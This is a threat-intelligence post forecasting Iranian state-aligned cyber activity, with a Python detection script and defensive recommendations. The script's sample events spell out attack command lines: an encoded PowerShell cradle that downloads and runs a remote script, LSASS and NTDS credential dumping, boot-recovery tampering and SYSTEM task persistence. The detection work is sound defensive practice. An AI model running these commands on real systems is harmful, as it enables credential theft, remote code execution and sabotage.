Iran’s Cyber Operations – Iran War

Our friends at SentinelLabs have published a thorough review of the current state of Iran's malicious cyber capabilities.  Recent US and Israeli strikes against Iranian targets, followed by Iranian attacks on multiple regional locations, present a highly dynamic geopolitical situation with credible cyber threat implications.  Iran has historically incorporated cyber operations into periods of regional escalation.  Given the rapid escalation of tensions and Iran's long track record of using cyber operations for asymmetric retaliation, coercive signaling, and strategic messaging, SentinelOne assesses that Iranian state-aligned cyber activity is likely to intensify in the near term.  Prior campaigns, including destructive wiper malware, infrastructure disruption, and influence operations masquerading as 'hacktivism', demonstrate both the capability and the intent to operate in the cyber domain alongside kinetic action.[1]  At the time of publication, SentinelOne has not attributed significant malicious cyber activity directly to these recent events.[2]

This article outlines Iran’s historical cyber posture, relevant tactics and tradecraft, and our forward-looking assessment of potential cyber responses in the days and weeks following the airstrikes.  Researchers assess with high confidence that organizations in Israel, the United States, and allied nations are likely to face direct or indirect targeting, particularly within government, critical infrastructure, defense, financial services, academic, and media sectors.  Analysts recommend that all clients, especially those operating in or supporting US and Israeli infrastructure, review their security posture and preparedness accordingly.

Sentinel’s assessment is current as of 28 February 2026 and reflects a rapidly evolving threat environment.

Iran’s Cyber Operations to Date – Iran presents a mature, well-resourced cyber threat, with more than 15 years of experience across a wide range of malicious cyber events.

Iran uses a diverse set of cyber tools to further state objectives, particularly preservation of the Iranian regime, including:

  • Espionage and credential theft via APT34, APT39, APT42, and MuddyWater, targeting military, civilian, telecommunications, and academic institutions, primarily in Israel, the wider Middle East, and the United States
  • Disruptive and destructive campaigns, including the use of wiper malware
  • Targeted spearphishing and social engineering campaigns supporting strategic intelligence collection across multiple industries
  • Fake hacktivist personas for plausible deniability and psychological impact (e.g., DarkBit, Cyber Av3ngers)
  • Coordinated disinformation and influence operations across Telegram, X, and compromised news outlets
  • Internet blackouts within Iran to control public opinion and narrative, which also blunt the effect of foreign influence operations
  • Proxy ransomware and criminal fronts that blur the line between state and financially motivated actors

Iranian cyber actors have previously aligned their operations with kinetic campaigns, acting either as a force multiplier for regional allies such as Hamas or as a standalone tool of retaliation.  The TTPs employed by Iranian 'hacktivists' increasingly mirror those used by state-sponsored APTs, raising questions about capability sharing and formal command-and-control relationships between the two.

Expected Iranian Cyber Response to Current Events

Precision Espionage Operations - Expect escalated targeting of Israeli defense, government, and intelligence networks using spearphishing, credential harvesting, and deployment of custom malware.  Historically, groups such as APT34 (OilRig) and APT42 (TA453) have leveraged legitimate access to move laterally and exfiltrate strategic intelligence.  US military and government organizations will likely be targeted in similar campaigns.

Anticipated Targets:

  • U.S. military and government organizations
  • Israeli defense entities and affiliated research organizations
  • U.S. and Israeli diplomatic infrastructure
  • Defense contractors and supply chain partners
  • Strategic allies and locations in the theater

Disruptive & Destructive Tactics - Iran has a well-documented history of using destructive malware and DDoS attacks to disrupt the critical infrastructure of its adversaries.  Analysts assess a high likelihood that similar tactics will be deployed against US and Israeli sectors, particularly utilities and public-facing systems.

Key techniques include:

  • Deployment of wipers via fake hacktivist personas or directly attributed APT clusters
  • Exploitation of unpatched or poorly secured public-facing web services for defacement and initial access
  • Use of scheduled tasks and LOLBins to execute custom wiper malware with stealth and persistence

Anticipated Targets:

  • Transportation, communication, energy, and water utilities in the U.S. and Israel
  • Telecom, alerting systems, and national broadcast infrastructure
  • Financial platforms and digital banking services

Coordinated Influence & Disinformation Campaigns - Iranian-aligned actors are likely to amplify disinformation campaigns to shape public perception, particularly around civilian impact, military failure, and geopolitical instability.  These efforts often run concurrently with real-world escalations and aim to degrade public trust in institutions.

Anticipated Themes:

  • Allegations of Israeli war crimes
  • US and Israeli military losses
  • Fabricated claims of successful Iranian cyber retaliation
  • Disinformation on the US–Israel political division
  • Leaks of manipulated or stolen documents misattributed to Israeli insiders
  • Lack of support from the US populace for the ongoing strikes against Iran

Probing Attacks on US & Israeli Infrastructure - Iran has demonstrated readiness to expand attacks to Western infrastructure during periods of high tension.  Recent examples include the exploitation of Unitronics PLCs at US water treatment plants (late 2023), highlighting a shift toward ICS/OT targets.  Such actions serve retaliatory and signaling purposes and are often designed to be low-impact yet high-visibility to maximize psychological effect.

Anticipated Targets:

  • U.S. defense industrial base, especially contractors supporting military action
  • Israeli military and key government organizations
  • Critical infrastructure (water, energy, transportation) in the U.S. and Israel
  • Regional partners (e.g., Jordan, UAE, Egypt, Saudi Arabia) aligned with U.S. and Israeli interests
  • Media and academic institutions reporting on the conflict

SentinelOne Detection & Monitoring Posture - SentinelOne research and detection teams have closely followed Iranian cyber actors for many years.  They provide multiple layers of protection and are closely monitoring emerging threat intelligence to maximize coverage.  Their detections extensively cover techniques known to be used by Iranian threat groups, including:

  • PowerShell and script abuse
  • Proxy tools
  • Credential theft
  • Keylogger components
  • Wipers
  • Browser credential theft
  • DLL sideloading
  • Tunneling tools (ngrok/Cloudflared)
  • Scheduled task persistence
  • Remote access tool abuse
  • Active Directory reconnaissance
  • Destructive boot tampering

These protections are not Iran-specific but are known to be effective against Iranian operations.  SentinelOne is actively monitoring the situation and can ship new detections quickly through Platform Rules updates or Live Security Updates.
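Several of the techniques listed above (encoded PowerShell download cradles, BCDEdit boot tampering, scheduled-task persistence, ngrok/Cloudflared tunneling, shadow-copy/NTDS and LSASS credential dumping, and execution from the PerfLogs directory) can be expressed as narrow process-creation detections and checked against sample telemetry.  The Python below is an added example written for this page; it is not SentinelOne's Platform Detection Library logic or any vendor's code.  The event shape mimics what a SIEM parses from Sysmon Event ID 1, and the host names, paths, PID and IP address are constructed for illustration; the matching is deliberately simple string and regex logic that a real deployment would tune against its own baseline.

```python
"""Illustrative detections for techniques named on this page: encoded PowerShell download
cradles, BCDEdit boot tampering, scheduled-task persistence, ngrok/Cloudflared tunneling,
shadow-copy/NTDS and LSASS credential dumping, execution from PerfLogs. Constructed example,
not SentinelOne's rules. Events are dicts shaped like parsed Sysmon Event ID 1 records."""
import base64
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|bitstransfer", re.I)
USER_WRITABLE = re.compile(r"\\(?:temp|appdata|programdata|perflogs|public)\\", re.I)
TUNNEL_HINTS = ("ngrok.exe", "cloudflared.exe", "tunnel run", ".ngrok.io", "trycloudflare.com")


def decode_encoded_powershell(cmdline: str) -> str:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error (malformed base64) is a ValueError subclass
        return ""


def _image_is(ev: Event, *names: str) -> bool:
    return ev["image"].lower().endswith(names)


def encoded_ps_download(ev: Event) -> bool:
    """Encoded PowerShell whose decoded body contains a download cradle."""
    return _image_is(ev, "powershell.exe", "pwsh.exe") and bool(
        DOWNLOAD_CRADLE.search(decode_encoded_powershell(ev["cmdline"])))


def bcdedit_boot_tampering(ev: Event) -> bool:
    """Recovery/boot-status changes typical of wipers; 'bcdedit /enum' alone does not fire."""
    c = ev["cmdline"].lower()
    return _image_is(ev, "bcdedit.exe") and any(
        s in c for s in ("recoveryenabled no", "bootstatuspolicy ignoreallfailures", "/deletevalue"))


def schtasks_persistence(ev: Event) -> bool:
    c = ev["cmdline"].lower()  # task created as SYSTEM, on a tight schedule, or from a writable path
    return _image_is(ev, "schtasks.exe") and "/create" in c and (
        "/ru system" in c or "/sc minute" in c or USER_WRITABLE.search(c) is not None)


def tunneling_tool(ev: Event) -> bool:
    c = ev["cmdline"].lower()
    return _image_is(ev, "ngrok.exe", "cloudflared.exe") or any(h in c for h in TUNNEL_HINTS)


def shadow_copy_credential_dump(ev: Event) -> bool:
    c = ev["cmdline"].lower()  # VSS/ntdsutil/diskshadow paths to SAM or NTDS.dit
    return ("vssadmin" in c and "create shadow" in c) or ("ntdsutil" in c and "ifm" in c) \
        or _image_is(ev, "diskshadow.exe") or ("ntds.dit" in c and _image_is(ev, "esentutl.exe", "cmd.exe"))


def lsass_dump(ev: Event) -> bool:
    c = ev["cmdline"].lower()
    return ("comsvcs" in c and "minidump" in c) or ("procdump" in c and "lsass" in c)


def perflogs_execution(ev: Event) -> bool:
    return "\\perflogs\\" in ev["image"].lower()


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("Encoded PowerShell Launching Download", encoded_ps_download),
    ("Boot Configuration Tampering via BCDEdit", bcdedit_boot_tampering),
    ("Suspicious Scheduled Task Persistence", schtasks_persistence),
    ("Tunneling Tool Activity (ngrok/Cloudflared)", tunneling_tool),
    ("Credential Dumping via Shadow Copy / NTDS", shadow_copy_credential_dump),
    ("LSASS Memory Dump Attempt", lsass_dump),
    ("Process Launched from PerfLogs Directory", perflogs_execution),
]


def evaluate(events: List[Event]) -> List[Tuple[str, str, str]]:
    """Return (host, rule name, command line) for every rule that fires on each event."""
    return [(ev["host"], name, ev["cmdline"]) for ev in events for name, rule in RULES if rule(ev)]


def _enc(ps: str) -> str:  # build a -EncodedCommand argument the way an attacker would
    return base64.b64encode(ps.encode("utf-16-le")).decode()


# Constructed sample telemetry (hypothetical hosts, paths, PID and IP); benign rows are mixed in.
SAMPLE_EVENTS: List[Event] = [
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9/s.ps1')")},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -enc " + _enc("Get-Process | Out-File C:\\logs\\p.txt")},  # benign
    {"host": "ws01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /create /tn Updater /sc minute /mo 5 /ru SYSTEM /tr C:\ProgramData\svc.exe"},
    {"host": "ws01", "image": r"C:\Windows\System32\schtasks.exe", "cmdline": "schtasks.exe /query /fo list"},
    {"host": "srv02", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled No"},
    {"host": "srv02", "image": r"C:\Windows\System32\bcdedit.exe", "cmdline": "bcdedit.exe /enum"},
    {"host": "dc01", "image": r"C:\Windows\System32\ntdsutil.exe",
     "cmdline": r'ntdsutil.exe "ac i ntds" "ifm" "create full C:\Temp\x" q q'},
    {"host": "dc01", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump 612 C:\Temp\l.dmp full"},
    {"host": "ws03", "image": r"C:\Users\j.doe\AppData\Local\Temp\cloudflared.exe",
     "cmdline": "cloudflared.exe tunnel run --token <redacted>"},
    {"host": "ws03", "image": r"C:\PerfLogs\OneDriveUpd.exe", "cmdline": "OneDriveUpd.exe"},
]

if __name__ == "__main__":
    for host, rule, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{host:6} {rule:44} {cmd[:60]}")
```

Run directly, the script prints seven findings from the constructed sample.  The benign rows (an encoded command with no download cradle, `schtasks /query`, `bcdedit /enum`) do not fire; keeping that kind of negative case alongside the positives is the false-positive control worth preserving when adapting these checks to real Sysmon or EDR telemetry.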

For maximum protection:

  • Turn on Live Updates
  • Ensure you are opted in to Emerging Threat Platform Rules
  • Activate the Platform Detection Library rules listed in Appendix A

Recommendations

Increase Vigilance Against Phishing and Credential Abuse:

  • Prioritize MFA enforcement and internal phishing detection
  • Monitor for abuse of VPN, email, and collaboration platforms
  • Monitor for suspicious activity involving legitimate user accounts and applications

Harden Critical Infrastructure and OT Environments:

  • Patch and segment exposed ICS components, especially those from common HMI/PLC vendors
  • Scan all Internet-facing infrastructure and patch any vulnerable Internet-facing services
  • Consider removing or restricting network access to any non-critical Internet-facing services, especially those not protected by MFA
  • Review DDoS mitigation playbooks and response procedures

Monitor for Influence Operations and Fake Leaks:

  • Establish rapid communication response protocols for disinformation relevant to your organization
  • Be prepared for threat actors using "hacktivist" branding and Telegram or Telegram-style platforms for communication
  • Assume that attribution may be masqueraded; determining the true origin of an operation requires detailed assessment

Review and Test Incident Response Plans:

  • Ensure IR and SOC teams maintain heightened alert status
  • Simulate data-wipe and ransomware scenarios
  • Simulate corporate social media hijacking scenarios and prepare for account pausing and access resets

Establish Clear Points of Contact:

  • Ensure the internal organization has direct POCs for support during security incidents
  • Communicate posture expectations and escalation paths internally
  • Monitor for activity associated with Iranian state-aligned threat actors


Closing Note - This SentinelOne report is intended to support informed decision-making and proactive defensive measures amid a dynamic and escalating geopolitical conflict.  The cyber threat landscape associated with Iranian state-aligned actors is adaptive, and both targeting priorities and tactics may shift rapidly in response to real-world developments, political statements, or perceived provocations.  Analysts advise readers to treat this as a time-sensitive assessment and to revisit posture, incident response, and monitoring processes regularly.

Appendix A - Customers should consider activating Platform Detection Library rules to improve coverage.  The following rules are known to be effective against Iranian cyber operations:

MuddyWater:

  • Possible MuddyWater DLL Drop Consistent with Audio Driver Sideloading

Credential Dumping:

  • Suspicious Task Creation for Credential Harvesting
  • Python-Based Network Exploitation Tool
  • Potential LSASS Dumping Tools
  • Credential Dumping via Shadow Copy
  • Interactive NTDS Harvesting via VSS
  • Cached Domain Credential Dumping

Tunneling & Remote Access:

  • Ngrok Domain Contacted
  • Cloudflared Persistent Tunnel Establishment Detected
  • Anomalous Process Initiating Cloudflare Tunnel Traffic

Collection & Exfiltration:

  • Keylogging Script via PowerShell
  • Chromium Browser Info Stealer via Remote Debugging
  • Browser Credential and Cookie Data Access Attempt

PowerShell/Script Abuse:

  • PowerShell Script Execution via Time-Based Integer IPv4
  • Suspicious Usage of .NET Reflection via PowerShell
  • Encoded PowerShell Launching Command Line Download

Defense Evasion, Impact, Discovery:

  • Potential DLL Sideloading in PerfLogs Directory
  • Disk Data Wipe Attempt via Dd Utility
  • Boot Configuration Tampering via BCDEdit
  • BloodHound Active Directory Reconnaissance File Creation

 

This article is shared at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  We provide cyber threat intelligence (CTI), including indicators of compromise, via a notification service (RedXray) or an analysis service (CTAC).  For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com

Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5207428251321676122

 

[1] https://www.secureworld.io/industry-news/lazarus-medusa-ransomware-us-healthcare

[2] https://www.sentinelone.com/blog/sentinelone-intelligence-brief-iranian-cyber-activity-outlook/
